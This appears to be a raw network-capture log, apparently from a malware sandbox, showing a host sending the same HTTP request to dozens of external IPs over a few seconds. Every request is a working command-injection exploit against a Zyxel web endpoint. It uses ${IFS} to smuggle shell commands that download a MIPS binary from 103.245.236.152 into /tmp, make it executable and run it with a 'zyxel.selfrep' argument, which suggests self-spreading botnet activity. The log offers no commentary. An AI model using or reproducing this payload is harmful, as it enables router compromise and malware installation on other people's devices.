                                          Jan 14, 2024 15:46:27.252206087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7118192.168.2.2354902191.203.16.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252218008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7119192.168.2.2359624153.228.61.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252279043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7120192.168.2.235256686.164.161.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252299070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7121192.168.2.2349492189.85.237.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252327919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7122192.168.2.235942276.21.145.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252334118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7123192.168.2.2357562187.44.240.207443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252374887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7124192.168.2.233394223.219.94.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252396107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7125192.168.2.234372689.33.38.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252427101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7126192.168.2.233711444.88.102.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252460003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7127192.168.2.2341344163.207.58.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252474070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7128192.168.2.2358310203.212.131.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252497911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7129192.168.2.234602445.106.243.201443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252537966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7130192.168.2.2338566191.94.235.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252563000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7131192.168.2.234259883.70.22.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252589941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7132192.168.2.235329470.151.203.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252610922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7133192.168.2.233303689.14.254.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252616882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7134192.168.2.235537050.43.19.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252649069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7135192.168.2.2353696222.174.169.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252705097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7136192.168.2.2355268142.78.227.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252722025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7137192.168.2.2342802171.207.112.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252748013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7138192.168.2.2360622145.7.242.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252779007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7139192.168.2.2346852164.107.61.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252811909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7140192.168.2.2345680126.246.150.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252851963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7141192.168.2.236090034.15.185.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252877951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7142192.168.2.2359936177.32.58.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252906084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7143192.168.2.2359432187.20.226.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252934933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7144192.168.2.2342256179.1.129.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252950907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7145192.168.2.233280467.236.192.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.252979994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7146192.168.2.2346870152.74.194.209443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.253007889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7147192.168.2.2352474208.152.0.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.253021955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7148192.168.2.234699447.237.78.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.253041029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7149192.168.2.2354138159.166.163.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.253070116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7150192.168.2.234804663.122.198.13443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.253108025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7151192.168.2.2346316204.103.243.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.253128052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7152192.168.2.2351558113.118.44.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.253154993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7153192.168.2.2357434196.29.117.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.253190041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7154192.168.2.2355418210.233.59.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.253209114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7155192.168.2.234572886.77.103.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.253232002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7156192.168.2.2333252220.161.229.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.253273964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7157192.168.2.235344467.205.18.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.253304958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7158192.168.2.23446482.127.200.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.253308058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7159192.168.2.2342772101.140.222.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.253340006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7160192.168.2.2349694161.117.185.55443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.253362894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7161192.168.2.2333108207.253.82.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.253380060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7162192.168.2.2333346144.184.122.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.255650997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7163192.168.2.2348358204.101.244.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.255959034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7164192.168.2.2355222174.194.226.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.255979061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7165192.168.2.2354292147.50.250.34443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.256017923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7166192.168.2.2336522166.164.40.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.256052017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7167192.168.2.235168862.62.59.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.256097078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7168192.168.2.2334752141.27.174.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.256124973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7169192.168.2.2336486189.246.19.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.256169081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7170192.168.2.2357874114.92.196.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.256212950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7171192.168.2.235819873.122.195.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.268610954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7172192.168.2.235831641.94.8.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.268650055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7173192.168.2.234758898.215.148.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.268680096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7174192.168.2.2352714129.2.88.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.268707991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7175192.168.2.2359362151.39.5.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.268749952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7176192.168.2.233616459.132.54.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.268790007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7177192.168.2.2360832181.239.192.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.268826962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7178192.168.2.2349960220.201.166.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.268853903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7179192.168.2.2346330130.12.124.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.268893957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7180192.168.2.23520881.220.56.71443
                                          TimestampBytes transferredDirectionData
